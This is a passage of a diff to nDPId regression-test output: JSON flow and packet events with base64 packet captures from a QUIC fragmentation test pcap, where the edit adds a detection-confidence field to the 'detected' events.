gfLg9p0zs80j5g\/fIFZXq6e3PRZGJlOduO5u\/FTED0nlkOStAfZ1cLQvrXot9UJE83tMH4DWSX6zM9DnOiDmars1HY1Qu1gozfortWRStAAQrzDmILzgi+tPIyMlRG1aiOK3rlgWXZwKS5kvAXGSQQPfQS9NlLwCrZHQT69B6mWCBPUBWh8QsOqv76k4Jv46eHsK0hoU92HUqhOqgk09EQBCnGI\/zWgYxU42nbsJkiMdKoLbVeUFxPtnCdHCWdIgtqELcoRLCnlfyj6fLmSJose7rxid75fKfwhgi9zbXUZHzUBVvrHaO1NpbexSUM4VztLAkHYegA4mZsAUTMXrwzehYvktbWieQfVgMvUC0tW6eNm9CeJQwCRuFen27D7bblWN395kZABQJz2J7igCkCcenO9hEEn4u3aBeGpUqZzmS+2bCxYqraA8Fpg0t+bmHW17tRBn26Wlj\/IBR5faBKZzUPN15J\/fmg\/PqeAeDRy7HA\/FEBoAg9iJEv3ZRqMQz+xrjOv+G3\/dDpiheVzILmxX+EOrazHQswKRcYoP3gCsVHHcszDooALZcZ+BQQzftaJeRTwIbx4z"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -115,20 +115,20 @@
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00622{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1621431760040,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431760040,"pkt":"AAAAAAAAAAEAdQOrCABFAAVizP5AAH4RzUyokEAFTFMoV+GnAbsFTrfUwP8AAB0I5zcbzyTN1LMAAEU085Brpbyr+2jh\/NyWKUdWZh90hrqs\/JUnV06AWtlVkrCYYR00Pib5lXHukuswI4apeXXYya1wVBFr8DpPUkWiGoC3sbaSvRZYYp3tBYoEJo8YIhwPSxXaYFfD6\/RsiM+Yfb2H1k8FEvnnpg0sxOjmgBY+O4W2eynZXgCIIV38HEw+wEDjZA2kk7L82T1bQYySl7HgNdHSquKu8SR8yPJcn8V2uMxsDXUCsucyI4\/wZySpci4W3UjA6hpswJQYsYncOuLPMzriT9nvkw9UXOlgzjajXpXUd\/JGwl0HyONFBLUkUDKjyeQYXeGyQW3ma\/zK00kJSnfXLEQC\/601KkV16N6qrZ0v5OR1cTLHDvXTzpfU721p0tTNZjXqZrYlC5ApJ869tkJz0gvSI815yu\/1aSemEd+xL\/8oRmyBCIllJq+YA3vMuW0w4\/T5JBaRPvDu30haGDWrTxiRXXYta2\/CdqVvbjVJtiTfDkkC1bYeze+3Ah85\/uP8diiaa9AR8AKCUBgQdJ3mENPMmAvvqo\/B+ziY39N9FFetzWHMNvAzeRNXDdkoheBvxSnvCsDetHFzuAVJDYI\/bys388LAY+YcZ2PLXZ4i6IMVrySiDR3dBi9J6Xh51PGX4vbMQUcpCXv4G342VJ1caxMpMC0WKSvRN\/bqWlMQ+RF7oj6QAUiBi3SwgLkBBChaMRaz6hO+99tY2xzKs6MRliASieiMP732ghruPSLQ+wkW3s1+76mAlzozUQwzPbS1PGTHvC010AWavdSmg87MToOsLUXgD4HnFyn2h8N\/zN0Y9kv+731G9nuRhhLm0utvCdYH7hRWyLbk56OLgd+REvXXwQQQpBwKlWgfOj3W3\/5qVvPq3e+dNdLj6fyCzr2ipjs5XbBlzIlCeM\/X82w9I6lQbG2MB8pWKZKtLdibzQ7WTlOJqcJ2CMdQhgH9A1bdiqPv\/gr5wXKSRUUJATME8kPSQNByUdL7GTcCBNzP+8ZUAcsI0bM2tgOdWh0suQyngSZKgXVLvx6wGBu+1wF\/mC2T9fk50gp1zDgTxJjhtLxXk3ylwvBp311b2znJyXpnhAKEllhdOQr6Tr8CSn8jAdZm+gC\/EWrlnqxU3bjZ8FRmLt5X6O3NKJ6DoHTIz7S4IKZcp2EE\/qrF59y9ofjxJIdx0H9xpLiBAZaTSw63h0cJs0HrTSWerWgqOhr90\/R76Qs8o\/fRdj0KfsMdcJ0uNDyxtoSBePmAxqS4gAyc7hFHKfA41dW9prrj3pJtaB8l6RP06jKTbRRFyZuDe6A9VYcgFUSM2zXSaVtYhvAVkemhrcWVfhKpPRpQAijaZZT4By9Fc75mrUC8\/jXvh0rSqRaZF4w8CZTfLoxB2+fbxhXS\/y2T4EIEyiUFCUG8C69qtn9uZOcZ3P61zXWpjuvaUy96vWpLSu3t+0FalFdLvnA8VuSf2lAEClkALW3Dl4vLfiIlNB4emRks21g88RhpsKHyXLOxAkbKh50EqqlhB1mllDYGWbm\/4xaT9s3Zafiaab8TWadT6jVEwkNzekV\/0AbiRBOXrL6jktjB5jxq4zn7l3VgtdxFNAmFQYDibYgJ3De9KSyXejEY1rNESvwittZgupicY+Dm1OETIost\/wF\/G3hHSgdvFNBHmfdSw4NKdZwUuGXdqN5OH9Rvmel41BzbqTaqBCe1ri0\/9znww4gdI1VUL9A6rt9xHmn2T0Eu019PmuUftYMzGJ+Wp8LyQupxLYsYZE2Wjo3Ainf0KmDOU7NxfIE1yCKzpfBd"}
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1621431857841,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431857841,"pkt":"AAAAAAAAAAEA00bUCABFAAViuPFAAH4RUFCokEAF1bwv9\/j4AbsFTi6fxv8AAB0I0bxRKTuUwgQAAEU0fyjgv48\/VCRtPz6ASN0OHxQrQLq7h+XvdqYpW0IdDgkyYs+qaZ2IuwKTrk6YqitoieAEJmESJxxd68I9xE+yxkJr90SUnR1M1QTaj6cNmtlgHivCEvYeIZrstWnYNHPWHxnYIDL\/faLN3v2l\/vAW9BxUhwUIIu2faUrN8uHdB\/1Wrbe6vX+0r97gH6rBkczoTPMVg2MQIvACvg7MEMvDmXReZiu8aHhYLNrKXQoHb3wlKFlaWklVhuGIkGp4WLeoDI28YQ3SoqEC3msnpaiKbJSu3i6gx3XYZSTNOZx2wTyUn5kAQEbqb5uoOB1osvVBX+OO4htJiDv1h\/1wp1YCP4Ga4XsP5b3LRFOWiCauo\/HDX\/dO+7Ks21ut5u7nrFp3vsYoOXsfxp3FeIFKCtW5kZD4EnHVyJ9Zv5ZsjCJnr6xOm5z7e1IdJiZc2UH557C9gO4HZL07YwIYBvxA4wecK4fxBR7uVNiQ0wrRJ7w0kX8LOcTGayOjs2lnNAGuPIUjzX6GdQ+Z6ezg2kVKIBy3g6BFqh5fYkn1MSCjFfmNy8pMek9wRbT5tx57QhbVEjzXKpfYCtfwBAPjvmTcyi\/pj1MMF5TdQU6Q9QzzZlwgK7SGoS2km9o4rEOuFsTnF65lollpj4WjyeQhLnNa47OLuo7V6lbQKKTXm54krAZoSaOjejVJLSvx4iwoHF4MJo0t4oNk8LuJjCQWC817H+Z91yZxFTv9SHWBSuEab71KDyg+CD9tUOH2iasAIoErfwlhLdyeLW8yCcg52npVgZ0HFkVfZqdV2LZOvMnR1Lg\/onBxIxjcTUBxhzgd3czjkrC9JJxXxAgQrtSuhn1dUlC22+vGs9MbLXg8o8BLwo7d1x8VTGQdGCnPHJxR6cm1HaHawimYIbxfZ0eKQ6Vt5aV+WhdjRqtUk3j3G5p0NglB1UWHexuNnoOmN+lBZl\/GapDd2m5Yk7FubUhQNbPoy6E8bME5Hyr\/o7sXuXXRcHrH4\/nWsGCvY2cX9njBk7l0Q3Yczt900ouVi1hKp\/UFjI5huUtSUtRnaMFTMB366CW+VDqVruM59b2jx9lTfzd8Z+TvHn6Syvm4tnFxFqmW3I+PMOiWhZlm7TO8sSkYpmYZPGgg63y9rYr6LeryRTudm5RUAR60p430i9LDtZIPD8L\/MTcq9RO1P7jlBqNqxA9zXscaw\/B56sjo6WGP1vLVdb4FB7besaQ5UMN\/nkGoKYOK0deEGrBwjmMxyU6xHUVyr830VfWqI8HAMQd9zqBnczWNEyIFokx9IwZdRoEl1iKfrT8hCud9tIKVpmH0bVMxmQxtxxxT8zSplUV07U4v7xPcnwepR7HmBCZlhrg1BGmEp4se9b9u4xoLK08+r1ejmIpu8VrM\/VOxNFOxYErJFfxlSs9U3X2QWpe9HZGajMBAk0q9\/clUh17xxU\/E6aLjJj3k35K86utGs2O220V0V06R4gxX2gbFkwOMY9INm5D1T523esnitGk9u1AfZJokW7t1XCTb71Id31C6\/p3ioxcXBd5BAbp\/OL9sejWk9TArIOZnUUDZmTsTOfiogn73e7vN5zFf8cIof0JYkZp9otum3UR4BRg87QtqURR6ehFMZE+c0BmbqnHZ89A\/2y4Apn9NnyDFZ0B9ih4m0az7qg2w2IhGEycq5dwSXGZZcya5GcjtVBe7BZ7TXCBQ0AlSjG\/PcOYH6vAazB1DcKOcGryDTW2ld4S\/DeIQ7lnUczZptB1DL94kJw3IET\/eU6zvDBmlBeRN"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1621431858130,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431858130,"pkt":"AAAAAAAAAAEA4PSECABFAAViduhAAH4RAluokEAF9Nag28wxAbsFTqBqzv8AAB0IlCvC3zvNTXQAAEU0bBkQLI3bPsbsoEo+cMFgRuBfI0IwALzZrBviHAA+Z1QJp1oftAmcZe0+1BtbG4PtaoRq86omaKbtxZpajLb14FXlpTsMbQWq548iLQ39D2mbEO3zF7ysXTwD\/P9gtJYLXSC0VWqv8z6iYP7A9ndUj4J9CsimScdH7Ab2WJohqMY5cmDhFqDohhOiLpahlc\/4Ug2oP7U6uykk3o\/sBx1t9\/ooiZ2L9IlfdPdzo5JC+fFevV1mvuFRA6qYzmhcKWxznVBjFJHIj1tsalMyiYEP7klZqDWRsUJbEL6smhbtt9aDog+ge1\/kDqXPWI58aqJbP0clqgdwPz9S2Y6WlkC6+L8byOJjqS6tC8RKuT7szyzaD\/QpeLtuTIaugz0rhTbG3tHV2+eAGw0JlKNnYY4d8gLImSL3Z6Vbebp9MOrwwenGSYEjJEdyKLbl91wAN4oX8fjB0uE4+Z1nljjQ7\/Ma\/RgFHOnpp8JptJLgEJQUuj7kca\/3lobKXvXUHslLAXaGHu93+qu4aAMp7dXhfcVd5T0FWmHXp+hPsOVQgNwfcRktO7mmDqTPc4g+iqUrcYsMitif3WlIVEwBPbtDteCVHHkYIPZf0u+syu9A+I7FZ\/5duQI3QVq8hoSrN7bG5w\/zvEqP\/yYI0sjCFuVzyhXgLIEZJ1qJGRZQmSo00VbsElmeDT5TArRJNB7LuwPPihSe5f5Hs5CtfrGYHAZ3s44Ph6a\/IzKJlY9P8nsk1zJw85nZ+gBW1pbpf7Yx\/rmROIiRfURp5w+iM4nAMz0PpDktxSPJLH6r6IEms2fxM+L62MlUVBrYxZJJ4FKD6OSMvWHR+I0vhCE1kpYYhUmcB5sRAbPNVykSrT9KfoViisi1N4w19VqeUgl2Qcs9W6sML2oqVYyVtGBCD9qZnkUGpY2w200a7PtBxVt\/QBEH9v4MPebuiH5rjnSwmFgF\/YosV+2evpl6G8EYlQHIlAthqw3OzMzNUp2uIoUf6nBnYLeE0fFV+obzpD\/u3S83796oUZOibm+TF\/PrubnS+F6u3RS3ljwSqE7VUMHGjfQSaSRBeed0LreweZVA\/\/uCm2qDttjlLYqNjHyrnYThnZom5ECvmIWgSxX9O95W5BQeuuA7HMmr11Xq9vK9dt33jd5FN1yJ5eBzKVde4uSpSNgwENQ0sTbmXF8W0di2iH\/3Y3JARyiVNvb87pbQiF2C3fPJvBbyOmdUzYi4IKODjNa8529r\/2WPUbyL0gcgBBvdC+00m+RoZ8pSEkm873NVfGtcv7ZJNfBbSSmOtEGolsa1rgMIjqSl+gu3HY54LWS5r+MnsCESbFYroCnveYzrsVdGohrb\/zq3EMH7BAbPbeE2Sc7d\/Ko6vjgRH\/9L3cq8ORzLT3GdrtyRveeT83v+9cCjRxC9ljG22JeAq7TqGxX2jJfa25ONu5zfti\/Q\/UCDd+R5D9Q9slQkxPCeDJTSOXa4gnpgy0Q49vnBGzMzMNwOxtJPSIb2QOpg7IidPlZBf2aUO5XpP0KqgFdpm7BG7ULgBjR2GFmXUP1c\/zzdTDDutnR9ALbmfU8Kf5Krd1hNOuhGq5klqMBVXf6hyAA9S4QMp\/it8pHP4\/S66VpOu3bNUTeTIUh888Aqw1WB0NjCw6\/asqZTdZrh8cvMmW+2WW7xmsl6WAqYoU+tialu7WkDUU8OoT42banjTBlSGGvh8863vIZ2StyYDb8zwIU4zuhyMr7FDtlza6jHpIArriq6hYW\/CxoKThchF5eUWwDlQolmqcSSMgBX"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1621431858501,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431858501,"pkt":"AAAAAAAAAAEA737VCABFAAViA9lAAH4RSiuokEAFI8KdL8CsAbsFTiKUxP8AAB0Iuy4iiZ7Rc3cAAEU0Q4F3W2ov\/JA2RQPk1kCE6d2abuA1AzJ9v4cgD5r98N+jLM5q\/vKba7ePXttHZOnfzIXKHdtGp13XXGc0y1g0VbYiejL5PEPTPKK+5FUHxNJc+4iSUfYHJil1jWJsaI14aq8Z9k\/D9Frx2Pd8Ccb5b8I5wMMvAXlFIaThZX3+88jwhgIBY4WhNolXEK3QjVERqqjNlflz0Crvl9eKzWDjAvjmOz12493yS+U4C5g7xeSC6Cv481a1zOEEDBXxUJwyeekPCKvNOVETC0idyTRu4Xx7IK\/97JI5UkTjH1VgYb5EEV1DY00jaUTBEjI+fpvuHX57KvIXmj+n1PLaIlVIJy8AxZjfib+NKJ2DnJlEkZOyKzqiFASH+Rv2xHATwBmim0oQbD6SH+mogD\/Zpo5pMTXstRq0ZunclX1q7Mso4TGqtUbs2zzTYctOAA+ng0TvelIWG4Bu4bkkRiZSqlwJ1jDY17CBHzqEyVQgWgeFozJDhGJh\/dhP8nm+IU5EDOJiIPPx8pW7TyQGz8lnsN6LAsQyJgXVZTCNJPU9t6HmegbS0bQ7Kt1DxeYvK6m+GxUMA1DiRw0yw80Uxxf4xuJnn3EJVi8ekAMdVXpaGI37r+vhgsLGCAZgMrHlnTtfOSbgYZBAPdnhiG4xbmDlbIuvY\/BrdQlshSbHN\/3tWjBfc0Zz0J59ufrjAJoriiVdye+Lc3LAld\/nudhV2vnaxR1ShgYPYZhQbGRWlEkEaL1z4rltv60VXAhCWkeJdSv1\/ACb44aJ8HLAaQ7pBCmit\/NMrMwITKyJcPkFF5GRWhel5oEvZ86mY1\/+WA5KqTi9Xb0N6B9CXR4d22U1O5JA419I\/H5b7Kkx0ByhWkeFRz9cXZPMDmowmLHSflTpfTjRerEoB9b+Rp9ZUpHpgHycHnEiiqsSYZ8fJXaPa5ArE6FfrIB\/5\/ex2ULG10VUM6bdMkBHDYOPYQwR5jQfvBJclQo48pqc+jEulTW4ACP9EukaDaWRXQiI\/ao9oqdHF73hElq8zIR0CIH1bOZkU5WrVTO4kXEcriR07\/4SHXlZ0F+XTEnvRY1owmXDXHgtgn794JMTxP6ovnrC1UqLv9d8SQ3P2kaXpKnETUi1\/jmOit96zvfXkyF+GojweLkNJjL5JM3njEGp7izSmZ\/PvKHWCYsP+157DfpYPmMO9R\/yz3E1zaEv\/1lMgciv1XSwptuzqoQHSbZjgs5nX68VkOSYsQYJ60P94MXKCCvjFqKn+6X2Mcn5Zop+3W0Nj0hveNw19pzYiEtOJJVwof6DyxkFKNuQU3HtgPl+GWUUWRig\/vzAY+l22jeUNKekbZmAn14baa3EO6690bwRTg8ZvdcHFz9TEDMbzR666JgoyJFvKc3UbuWhbUstPfau4V9F9qnYD6cFiMRtdBaOgJniitEFpxszoLhTHZZT9Vh\/mXiomY\/wkAwa56XbyHUeRgPu9zAwN6kJW+N7Ye6rlwVPmyPFgUTGn9xmD2YMEr3PeigCIEsSvM0ujBoTlPiFdY26WdH4Tr\/XKmZTQnQrnQptoJDzmG+XaceU23hwOGeY5C6MIxfdvw7Blgvoz8uvCg\/rl0wKl3ubvkABoQ3NzBDUuTP++2gH8HONwB\/wWFza94nHQdoBnk4+rigd+C1oglD8lXIC31MYbN8b51797Aod+NKPnYy35esPaxwNUQDbAPX6W5J2vPC3vU+GmsC754Qjyng5h09pOy7odu+JINrtufSLUCeH14aG0hXQTPJRTPDp6g0aPtL075ZE"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
